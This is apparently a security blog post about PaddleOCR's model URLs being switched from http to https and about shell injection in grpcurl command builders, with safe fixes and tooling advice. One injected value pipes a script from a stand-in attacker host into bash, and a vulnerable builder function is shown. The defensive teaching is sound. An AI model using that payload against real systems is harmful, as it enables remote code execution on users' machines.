Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation
Introduction
When we think about application security, we often focus on the obvious attack surfaces — login forms, API endpoints, user inputs. But some of the most dangerous vulnerabilities hide in plain sight: in configuration files, in helper scripts, and in the small decisions developers make when wiring systems together.
This post examines a high-severity vulnerability found in PaddleOCR's deployment configuration — specifically, the use of unencrypted http:// URLs for downloading machine learning model files. While this might seem like a minor oversight, the consequences can be severe: a network-positioned attacker can silently replace legitimate model files with malicious ones, potentially turning your OCR pipeline into a backdoor.
We'll also explore the broader context of shell injection via unsafe string concatenation in gRPCurl command generation — a related attack pattern that developers working with gRPC tooling must understand.
The Vulnerability Explained
What Went Wrong?
The vulnerability lives in deploy/hubserving/ocr_system/params.py, the configuration module for PaddleOCR's serving infrastructure. The original code specified model download URLs using plain http://:
# VULNERABLE: Unencrypted HTTP download URLs
cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"
At the same time, the related gRPCurl command generation code uses unsafe string concatenation to build shell commands from user-controlled values — including headers, endpoints, and data pulled from API responses — without any shell escaping. This means an attacker who can influence those values can inject shell metacharacters.
Two Vulnerabilities, One Root Cause: Insufficient Input Handling
These two issues share a common theme: trusting external data without sanitization or secure transport.
- HTTP model downloads: No encryption means no integrity. Anyone on the same network (coffee shop Wi-Fi, shared cloud VPC, compromised router) can perform a Man-in-the-Middle (MitM) attack.
- Shell injection in gRPCurl commands: When user-controlled strings from API responses are interpolated directly into shell command strings, attackers can break out of the intended command structure.
How Could It Be Exploited?
Attack Scenario 1: Model File Poisoning via HTTP MitM
Imagine a developer or automated CI/CD pipeline running PaddleOCR's model download script on a shared cloud network:
Developer Machine ──HTTP──► [ATTACKER in the middle] ──► Model Server
                                      │
                                      ▼
                          Serves malicious .tar file
                          containing backdoored model
Because the download uses plain http://, there is:
- No encryption — the attacker can read the traffic
- No integrity check at the transport layer — the attacker can modify the response
- No certificate validation — the client has no way to verify the server's identity
The attacker serves a .tar file that, when extracted, contains a model file crafted to exploit deserialization vulnerabilities, or a __init__.py that executes arbitrary code when the model is loaded.
Attack Scenario 2: Shell Injection via gRPCurl Command Generation
Consider a helper function that builds a grpcurl command for users to copy and run:
# VULNERABLE pattern (illustrative)
def build_grpcurl_command(endpoint, header, data):
    # Values are pasted between literal quotes with no escaping
    cmd = f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"
    return cmd
If data comes from an API response or user input and contains:
'; curl http://attacker.com/shell.sh | bash; echo '
The generated command becomes:
grpcurl -H 'Authorization: Bearer token' -d ''; curl http://attacker.com/shell.sh | bash; echo '' endpoint service.Method
When the user pastes and runs this command, arbitrary code executes on their machine.
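To see the breakout without running anything, the generated string can be tokenized with Python's shlex.split(). This is a minimal sketch: the endpoint localhost:50051 is an assumed placeholder, and shlex.split() only approximates POSIX word splitting (it does not treat ; or | as operators). Even so, it shows that the payload no longer arrives as a single -d argument.

```python
import shlex

def build_grpcurl_command(endpoint, header, data):
    # Same vulnerable pattern as above: values pasted between literal quotes
    return f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"

payload = "'; curl http://attacker.com/shell.sh | bash; echo '"
cmd = build_grpcurl_command(
    "localhost:50051",              # assumed placeholder endpoint
    "Authorization: Bearer token",
    payload,
)

# shlex.split only tokenizes the string; nothing is executed here.
tokens = shlex.split(cmd)
print(tokens)
```

In the printed list, curl shows up as a word of its own rather than as part of the data value, which is exactly what a real shell would act on.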
Real-World Impact
| Risk | Description |
|---|---|
| Model Integrity | Poisoned models can produce incorrect OCR results, enabling fraud or bypassing security checks |
| Code Execution | Malicious model files can execute code during loading via unsafe deserialization |
| Supply Chain Attack | Compromised models distributed to all users of the system |
| Shell Code Execution | Injected shell commands run with the privileges of the user who pastes the gRPCurl command |
The Fix
What Changed?
The fix is elegantly simple — all three model download URLs were upgraded from http:// to https://:
- cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
- cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
- cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"
+ cfg.det_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
+ cfg.rec_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
+ cfg.cls_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"
Why This Works
HTTPS provides three critical security properties that HTTP lacks:
- Confidentiality: TLS encryption prevents eavesdropping on the download
- Integrity: TLS authenticates every record (with a MAC or an authenticated-encryption cipher), so tampering in transit is detected
- Authentication: Certificate validation ensures you're talking to the real server, not an impersonator
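These guarantees only hold if the URL actually uses https, so it can help to reject anything else before a download starts. The following is a minimal sketch of such a guard; require_https is a hypothetical helper name, not part of PaddleOCR.

```python
from urllib.parse import urlsplit

def require_https(url: str) -> str:
    """Return the URL unchanged if it uses https, otherwise raise ValueError.

    Hypothetical helper for illustration; not part of PaddleOCR.
    """
    parts = urlsplit(url)  # urlsplit lowercases the scheme
    if parts.scheme != "https" or not parts.netloc:
        raise ValueError(f"Refusing non-HTTPS download URL: {url!r}")
    return url

det_model_url = require_https(
    "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
)
```

Calling the guard at the point where the URL is consumed, rather than where it is configured, also catches values that arrive from environment variables or overrides.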
Fixing Shell Injection: The Right Approach
For the gRPCurl command generation issue, the fix requires proper shell escaping. Here's how to do it safely in Python:
import shlex

# SAFE: Use shlex.quote() to escape all user-controlled values
def build_grpcurl_command(endpoint, header, data):
    safe_header = shlex.quote(header)
    safe_data = shlex.quote(data)
    safe_endpoint = shlex.quote(endpoint)
    cmd = f"grpcurl -H {safe_header} -d {safe_data} {safe_endpoint} service.Method"
    return cmd
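shlex.quote() wraps the string in single quotes and escapes any single quotes within it, so a POSIX shell reads the whole value as one literal argument and the metacharacters inside it have no effect. The quoting is designed for POSIX-style shells; it does not protect commands pasted into cmd.exe or PowerShell.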
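One way to check the effect is a round trip: quote the values, then split the resulting command line again with shlex.split() and confirm each value comes back as exactly one argument. This is a sketch using the same injection payload as earlier; the endpoint localhost:50051 is an assumed placeholder.

```python
import shlex

def build_grpcurl_command(endpoint, header, data):
    # Every user-controlled value is quoted before interpolation
    return (
        f"grpcurl -H {shlex.quote(header)} -d {shlex.quote(data)} "
        f"{shlex.quote(endpoint)} service.Method"
    )

payload = "'; curl http://attacker.com/shell.sh | bash; echo '"
cmd = build_grpcurl_command(
    "localhost:50051",              # assumed placeholder endpoint
    "Authorization: Bearer token",
    payload,
)

# Splitting the quoted command recovers the original values, one per argument.
args = shlex.split(cmd)
print(args[4] == payload)
```

The payload survives intact as the value of -d instead of being interpreted as additional commands.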
Even better — avoid shell commands entirely when possible:
import subprocess

# BEST: Use subprocess with a list of arguments (no shell=True)
def run_grpcurl(endpoint, header, data):
    result = subprocess.run(
        ["grpcurl", "-H", header, "-d", data, endpoint, "service.Method"],
        capture_output=True,
        text=True,
        shell=False  # Never use shell=True with user input
    )
    return result.stdout
When you pass a list of arguments to subprocess.run() with shell=False, the OS handles argument separation directly — there is no shell to inject into.
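The behavior can be observed without grpcurl installed. In this sketch the Python interpreter stands in for grpcurl as a child process that simply echoes its first argument, which is an assumption made purely so the example is runnable anywhere.

```python
import subprocess
import sys

payload = "'; curl http://attacker.com/shell.sh | bash; echo '"

# Stand-in child process: writes its first argument back to stdout.
echo_script = "import sys; sys.stdout.write(sys.argv[1])"

result = subprocess.run(
    [sys.executable, "-c", echo_script, payload],  # list form, no shell involved
    capture_output=True,
    text=True,
    check=True,
)
received = result.stdout
print(received == payload)
```

The child receives the payload byte for byte as a single argument; no part of it is parsed as shell syntax.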
Prevention & Best Practices
1. Always Use HTTPS for Downloading Artifacts
This is a non-negotiable baseline for any production system:
# ❌ Never do this
url = "http://example.com/model.tar"
# ✅ Always do this
url = "https://example.com/model.tar"
Go further by also verifying checksums after download:
import hashlib
import os
import requests

def download_and_verify(url: str, expected_sha256: str, dest_path: str) -> str:
    # Stream to disk while hashing, so large models are never held fully in memory
    response = requests.get(url, stream=True, timeout=30)
    response.raise_for_status()
    sha256 = hashlib.sha256()
    with open(dest_path, 'wb') as f:
        for chunk in response.iter_content(chunk_size=8192):
            f.write(chunk)
            sha256.update(chunk)
    actual = sha256.hexdigest()
    if actual != expected_sha256.lower():
        os.remove(dest_path)  # do not leave an unverified file behind
        raise ValueError(f"Checksum mismatch! Expected {expected_sha256}, got {actual}")
    return dest_path
2. Never Use String Concatenation for Shell Commands
| Approach | Safety | Recommendation |
|---|---|---|
| os.system(f"cmd {user_input}") | ❌ Dangerous | Never use |
| subprocess.run(cmd_string, shell=True) | ❌ Dangerous | Avoid with user input |
| subprocess.run([...], shell=False) | ✅ Safe | Preferred |
| shlex.quote() + string | ⚠️ Acceptable | Use when list form isn't possible |
3. Treat All External Data as Untrusted
Values from API responses, configuration files, environment variables, and network responses should all be treated as potentially hostile:
# Validate and sanitize before use
import re

def validate_endpoint(endpoint: str) -> str:
    # Only allow valid hostname:port patterns
    pattern = r'[a-zA-Z0-9.-]+:\d{1,5}'
    # fullmatch avoids the trailing-newline loophole of re.match with '$'
    if not re.fullmatch(pattern, endpoint):
        raise ValueError(f"Invalid endpoint format: {endpoint!r}")
    return endpoint
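A pattern check like this can be tightened further. The sketch below is a hypothetical stricter variant (validate_endpoint_strict is an illustrative name) that also rejects ports outside 1-65535 and hostnames beginning with a dash, which a command-line tool could otherwise mistake for a flag.

```python
import re

# Hostname must start with an alphanumeric character; the port is captured for a range check.
_ENDPOINT = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]*:(\d{1,5})")

def validate_endpoint_strict(endpoint: str) -> str:
    """Hypothetical stricter validator: hostname:port with a port in 1-65535."""
    match = _ENDPOINT.fullmatch(endpoint)
    if match is None:
        raise ValueError(f"Invalid endpoint format: {endpoint!r}")
    port = int(match.group(1))
    if not 1 <= port <= 65535:
        raise ValueError(f"Port out of range: {port}")
    return endpoint

print(validate_endpoint_strict("localhost:50051"))
```

Validation of this kind complements argument lists and quoting rather than replacing them: it narrows what a value may contain, while the other two control how the value is passed along.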
4. Security Scanning Tools
Integrate these tools into your CI/CD pipeline to catch these issues automatically:
- Bandit: Python security linter that detects shell=True, risky URL-opening calls, and other issues
- Safety: Checks Python dependencies for known vulnerabilities
- Semgrep: Static analysis with rules for shell injection, insecure URLs, and more
- Trivy: Container and filesystem scanning for misconfigurations
# Run Bandit on your codebase
pip install bandit
bandit -r deploy/ -ll
# Example of a Bandit finding (B310 is reported on urllib URL-opening calls):
# >> Issue: [B310:urllib_urlopen] Audit url open for permitted schemes.
#    Allowing use of file:/ or custom schemes is often unexpected.
#    Severity: Medium   Confidence: High
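General-purpose linters may not flag a URL that is merely stored as a string in a config module, so a small project-specific check can complement them. The following is a minimal sketch of such a check; find_cleartext_urls is a hypothetical helper, and the sample config lines use example.com placeholders.

```python
import re

# Matches cleartext http:// URLs; https:// URLs do not match this pattern.
HTTP_URL = re.compile(r"""http://[^\s'"]+""")

def find_cleartext_urls(source: str) -> list:
    """Return (line_number, url) pairs for every http:// URL in the text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in HTTP_URL.finditer(line):
            findings.append((lineno, match.group(0)))
    return findings

# Placeholder config content for illustration
sample = (
    'cfg.det_model_url = "http://example.com/det.tar"\n'
    'cfg.rec_model_url = "https://example.com/rec.tar"\n'
)
findings = find_cleartext_urls(sample)
print(findings)
```

A CI job could run a check like this over configuration files and fail the build when the list is non-empty.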
5. Relevant Security Standards
- CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)
- CWE-319: Cleartext Transmission of Sensitive Information
- OWASP A03:2021: Injection — covers shell injection and command injection
- OWASP A02:2021: Cryptographic Failures — covers insecure HTTP transmission
Conclusion
This vulnerability is a reminder that security is in the details. One character, the s that turns http into https, stands between a secure model download pipeline and a potential supply chain attack. Similarly, one function call, shlex.quote(), or a switch to subprocess.run() with an argument list is the difference between a safe CLI helper and a command injection vector.
Key Takeaways
- 🔒 Always use HTTPS for downloading any external files, especially binary artifacts like ML models
- 🧹 Never concatenate user-controlled strings into shell commands; use shlex.quote() or argument lists
- 🔍 Treat all external data as untrusted, including API response values used in command generation
- 🤖 Automate security scanning with tools like Bandit and Semgrep to catch these patterns in CI/CD
- ✅ Verify checksums of downloaded files to add a second layer of integrity protection beyond TLS
Security isn't about writing perfect code — it's about building habits and systems that make the secure choice the easy choice. Upgrading a URL scheme and using proper escaping functions are exactly the kind of small, high-impact changes that make software meaningfully safer.
Stay secure, and keep shipping. 🛡️